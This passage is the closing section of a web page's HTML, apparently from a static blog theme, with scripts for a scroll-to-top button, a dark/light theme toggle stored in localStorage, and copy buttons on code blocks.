            mybutton.style.visibility = "hidden";
            mybutton.style.opacity = "0";
        }
    };

</script>
<script>
    document.getElementById("theme-toggle").addEventListener("click", () => {
        if (document.body.className.includes("dark")) {
            document.body.classList.remove('dark');
            localStorage.setItem("pref-theme", 'light');
        } else {
            document.body.classList.add('dark');
            localStorage.setItem("pref-theme", 'dark');
        }
    })

</script>
<script>
    document.querySelectorAll('pre > code').forEach((codeblock) => {
        const container = codeblock.parentNode.parentNode;

        const copybutton = document.createElement('button');
        copybutton.classList.add('copy-code');
        copybutton.innerText = 'copy';

        function copyingDone() {
            copybutton.innerText = 'copied!';
            setTimeout(() => {
                copybutton.innerText = 'copy';
            }, 2000);
        }

        copybutton.addEventListener('click', (cb) => {
            if ('clipboard' in navigator) {
                navigator.clipboard.writeText(codeblock.textContent);
                copyingDone();
                return;
            }

            const range = document.createRange();
            range.selectNodeContents(codeblock);
            const selection = window.getSelection();
            selection.removeAllRanges();
            selection.addRange(range);
            try {
                document.execCommand('copy');
                copyingDone();
            } catch (e) { };
            selection.removeRange(range);
        });

        if (container.classList.contains("highlight")) {
            container.appendChild(copybutton);
        } else if (container.parentNode.firstChild == container) {
            
        } else if (codeblock.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName == "TABLE") {
            
            codeblock.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(copybutton);
        } else {
            
            codeblock.parentNode.appendChild(copybutton);
        }
    });
</script>
</body>

</html>
